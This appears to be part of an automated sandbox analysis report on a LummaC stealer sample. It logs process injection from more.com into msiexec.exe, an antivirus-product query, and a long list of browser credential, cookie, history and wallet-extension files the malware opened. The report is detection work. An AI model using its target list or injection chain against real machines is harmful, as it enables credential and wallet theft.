                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: DF9330Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3193008Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: DF9330Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 309A008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: Set-up.exe, 00000005.00000002.2020365738.000000006C32E000.00000002.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: n+lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,5_2_6BB673B4
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6BBDF356
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,5_2_6BB652E4
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6BBDF2EF
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,5_2_6BB67270
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,5_2_6BB6767A
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,5_2_6BB6750C
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: _Getdateorder,___lc_handle_func,GetLocaleInfoW,8_2_6BC3B33D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_00855FBB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00855FBB
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB762FC _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,_strlen,_malloc_crt,_strlen,strcpy_s,__invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,5_2_6BB762FC
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB9BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,5_2_6BB9BE38
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
